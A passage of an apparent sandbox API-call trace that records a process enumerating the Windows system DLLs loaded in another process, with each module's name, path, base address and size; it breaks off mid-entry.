[0044.778] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x2611c10, cb=0x18 | out: lpmodinfo=0x2611c10*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0044.782] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0044.785] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0044.788] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce60000, lpmodinfo=0x2613dd0, cb=0x18 | out: lpmodinfo=0x2613dd0*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0044.791] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LOGONCLI.DLL") returned 0xc [0044.794] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LOGONCLI.DLL" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0044.797] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefab10000, lpmodinfo=0x2615fa0, cb=0x18 | out: lpmodinfo=0x2615fa0*(lpBaseOfDll=0x7fefab10000, SizeOfImage=0xf000, EntryPoint=0x7fefab17e80)) returned 1 [0044.801] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefab10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wiarpc.dll") returned 0xa [0044.804] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefab10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")) returned 0x1e [0044.808] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa9f0000, lpmodinfo=0x2618178, cb=0x18 | out: lpmodinfo=0x2618178*(lpBaseOfDll=0x7fefa9f0000, SizeOfImage=0x112000, EntryPoint=0x7fefaa0f354)) returned 1 [0044.811] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa9f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="schedsvc.dll") returned 0xc [0044.815] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa9f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")) returned 0x20 [0044.818] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc80000, lpmodinfo=0x261a348, cb=0x18 | out: lpmodinfo=0x261a348*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0044.821] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0044.825] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0044.828] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefe070000, lpmodinfo=0x261c508, cb=0x18 | out: lpmodinfo=0x261c508*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0044.831] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefe070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0044.835] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefe070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0044.838] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x261eae0, cb=0x18 | out: lpmodinfo=0x261eae0*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0044.842] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0044.845] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0044.849] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd260000, lpmodinfo=0x2620ca0, cb=0x18 | out: lpmodinfo=0x2620ca0*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0044.852] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0044.856] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0044.859] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc30000, lpmodinfo=0x2622e60, cb=0x18 | out: lpmodinfo=0x2622e60*(lpBaseOfDll=0x7fefcc30000, SizeOfImage=0x39000, EntryPoint=0x7fefcc3c0f0)) returned 1 [0044.862] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc30000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="UBPM.dll") returned 0x8 [0044.867] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc30000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\UBPM.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")) returned 0x1c [0044.870] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa9e0000, lpmodinfo=0x2625020, cb=0x18 | out: lpmodinfo=0x2625020*(lpBaseOfDll=0x7fefa9e0000, SizeOfImage=0xa000, EntryPoint=0x7fefa9e260c)) returned 1 [0044.874] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa9e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ktmw32.dll") returned 0xa [0044.877] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa9e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0044.881] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbc60000, lpmodinfo=0x26271e0, cb=0x18 | out: lpmodinfo=0x26271e0*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0044.884] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbc60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0044.888] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbc60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0044.892] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x26293a0, cb=0x18 | out: lpmodinfo=0x26293a0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0044.895] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0044.899] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0044.903] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa960000, lpmodinfo=0x262b560, cb=0x18 | out: lpmodinfo=0x262b560*(lpBaseOfDll=0x7fefa960000, SizeOfImage=0x77000, EntryPoint=0x7fefa96afd0)) returned 1 [0044.907] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa960000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="taskcomp.dll") returned 0xc [0044.910] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa960000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")) returned 0x20 [0044.914] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x262d730, cb=0x18 | out: lpmodinfo=0x262d730*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0044.918] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0044.922] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0044.925] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x262f8f0, cb=0x18 | out: lpmodinfo=0x262f8f0*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0044.929] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0044.934] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0044.938] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x2631ab0, cb=0x18 | out: lpmodinfo=0x2631ab0*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0044.942] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0044.955] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0044.959] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2633c98, cb=0x18 | out: lpmodinfo=0x2633c98*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0044.969] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0044.973] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0044.977] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd180000, lpmodinfo=0x2467410, cb=0x18 | out: lpmodinfo=0x2467410*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0044.981] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd180000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0044.985] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd180000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0044.989] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc2b0000, lpmodinfo=0x24695d0, cb=0x18 | out: lpmodinfo=0x24695d0*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0044.993] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0044.997] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0045.001] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc130000, lpmodinfo=0x246b858, cb=0x18 | out: lpmodinfo=0x246b858*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0045.005] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc130000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0045.009] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc130000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0045.013] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa730000, lpmodinfo=0x246da18, cb=0x18 | out: lpmodinfo=0x246da18*(lpBaseOfDll=0x7fefa730000, SizeOfImage=0x9000, EntryPoint=0x7fefa7311a0)) returned 1 [0045.017] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa730000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="tschannel.dll") returned 0xd [0045.021] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa730000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tschannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")) returned 0x21 [0045.026] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9ea0000, lpmodinfo=0x246fbe8, cb=0x18 | out: lpmodinfo=0x246fbe8*(lpBaseOfDll=0x7fef9ea0000, SizeOfImage=0x3a000, EntryPoint=0x7fef9ebd020)) returned 1 [0045.030] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9ea0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmisvc.dll") returned 0xa [0045.035] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9ea0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wbem\\wmisvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")) returned 0x23 [0045.039] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x2471db0, cb=0x18 | out: lpmodinfo=0x2471db0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0045.043] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0045.047] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0045.051] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x2473f80, cb=0x18 | out: lpmodinfo=0x2473f80*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0045.056] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0045.061] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0045.065] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9d80000, lpmodinfo=0x2476140, cb=0x18 | out: lpmodinfo=0x2476140*(lpBaseOfDll=0x7fef9d80000, SizeOfImage=0x92000, EntryPoint=0x7fef9df51ec)) returned 1 [0045.070] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9d80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="iphlpsvc.dll") returned 0xc [0045.074] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9d80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")) returned 0x20 [0045.078] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x2478310, cb=0x18 | out: lpmodinfo=0x2478310*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0045.082] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0045.087] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0045.091] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x247a4d0, cb=0x18 | out: lpmodinfo=0x247a4d0*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0045.096] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0045.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0045.104] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x247c6a0, cb=0x18 | out: lpmodinfo=0x247c6a0*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0045.109] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0045.113] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0045.118] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x247e870, cb=0x18 | out: lpmodinfo=0x247e870*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0045.122] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0045.127] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0045.132] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb830000, lpmodinfo=0x2480a40, cb=0x18 | out: lpmodinfo=0x2480a40*(lpBaseOfDll=0x7fefb830000, SizeOfImage=0x11000, EntryPoint=0x7fefb8314c0)) returned 1 [0045.136] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0045.141] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")) returned 0x1f [0045.146] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9d30000, lpmodinfo=0x2482c00, cb=0x18 | out: lpmodinfo=0x2482c00*(lpBaseOfDll=0x7fef9d30000, SizeOfImage=0x42000, EntryPoint=0x7fef9d317e4)) returned 1 [0045.151] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9d30000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sqmapi.dll") returned 0xa [0045.155] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9d30000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")) returned 0x1e [0045.160] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9ce0000, lpmodinfo=0x2484dc0, cb=0x18 | out: lpmodinfo=0x2484dc0*(lpBaseOfDll=0x7fef9ce0000, SizeOfImage=0x47000, EntryPoint=0x7fef9ce1040)) returned 1 [0045.165] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9ce0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WDSCORE.dll") returned 0xb [0045.169] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9ce0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WDSCORE.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")) returned 0x1f [0045.174] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b40000, lpmodinfo=0x2486f80, cb=0x18 | out: lpmodinfo=0x2486f80*(lpBaseOfDll=0x7fef9b40000, SizeOfImage=0x3d000, EntryPoint=0x7fef9b41070)) returned 1 [0045.179] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="srvsvc.dll") returned 0xa [0045.184] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")) returned 0x1e [0045.189] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b10000, lpmodinfo=0x2489140, cb=0x18 | out: lpmodinfo=0x2489140*(lpBaseOfDll=0x7fef9b10000, SizeOfImage=0x25000, EntryPoint=0x7fef9b28c54)) returned 1 [0045.194] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="browser.dll") returned 0xb [0045.199] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")) returned 0x1f [0045.203] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa3a0000, lpmodinfo=0x248b318, cb=0x18 | out: lpmodinfo=0x248b318*(lpBaseOfDll=0x7fefa3a0000, SizeOfImage=0x1b0000, EntryPoint=0x7fefa3a1010)) returned 1 [0045.208] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa3a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VSSAPI.DLL") returned 0xa [0045.213] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa3a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VSSAPI.DLL" (normalized: "c:\\windows\\system32\\vssapi.dll")) returned 0x1e [0045.218] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa380000, lpmodinfo=0x248d4d8, cb=0x18 | out: lpmodinfo=0x248d4d8*(lpBaseOfDll=0x7fefa380000, SizeOfImage=0x17000, EntryPoint=0x7fefa381060)) returned 1 [0045.223] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa380000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VssTrace.DLL") returned 0xc [0045.228] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa380000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VssTrace.DLL" (normalized: "c:\\windows\\system32\\vsstrace.dll")) returned 0x20 [0045.233] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb980000, lpmodinfo=0x248f6a8, cb=0x18 | out: lpmodinfo=0x248f6a8*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0045.238] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb980000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="samcli.dll") returned 0xa [0045.244] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb980000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0045.248] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9a80000, lpmodinfo=0x2491868, cb=0x18 | out: lpmodinfo=0x2491868*(lpBaseOfDll=0x7fef9a80000, SizeOfImage=0x84000, EntryPoint=0x7fef9ad1118)) returned 1 [0045.253] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9a80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netcfgx.dll") returned 0xb [0045.259] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9a80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")) returned 0x1f [0045.264] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb40000, lpmodinfo=0x2493a28, cb=0x18 | out: lpmodinfo=0x2493a28*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0045.269] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="devrtl.DLL") returned 0xa [0045.274] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\devrtl.DLL" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0045.279] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9a60000, lpmodinfo=0x2495be8, cb=0x18 | out: lpmodinfo=0x2495be8*(lpBaseOfDll=0x7fef9a60000, SizeOfImage=0x1a000, EntryPoint=0x7fef9a73fbc)) returned 1 [0045.284] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9a60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NCI.dll") returned 0x7 [0045.289] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9a60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCI.dll" (normalized: "c:\\windows\\system32\\nci.dll")) returned 0x1b [0045.294] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9930000, lpmodinfo=0x2497d98, cb=0x18 | out: lpmodinfo=0x2497d98*(lpBaseOfDll=0x7fef9930000, SizeOfImage=0x12c000, EntryPoint=0x7fef99e0ef0)) returned 1 [0045.300] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9930000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcore.dll") returned 0xc [0045.305] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9930000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")) returned 0x25 [0045.311] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98c0000, lpmodinfo=0x2499f70, cb=0x18 | out: lpmodinfo=0x2499f70*(lpBaseOfDll=0x7fef98c0000, SizeOfImage=0x62000, EntryPoint=0x7fef98fbd80)) returned 1 [0045.316] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="esscli.dll") returned 0xa [0045.323] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")) returned 0x23 [0045.328] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x249c138, cb=0x18 | out: 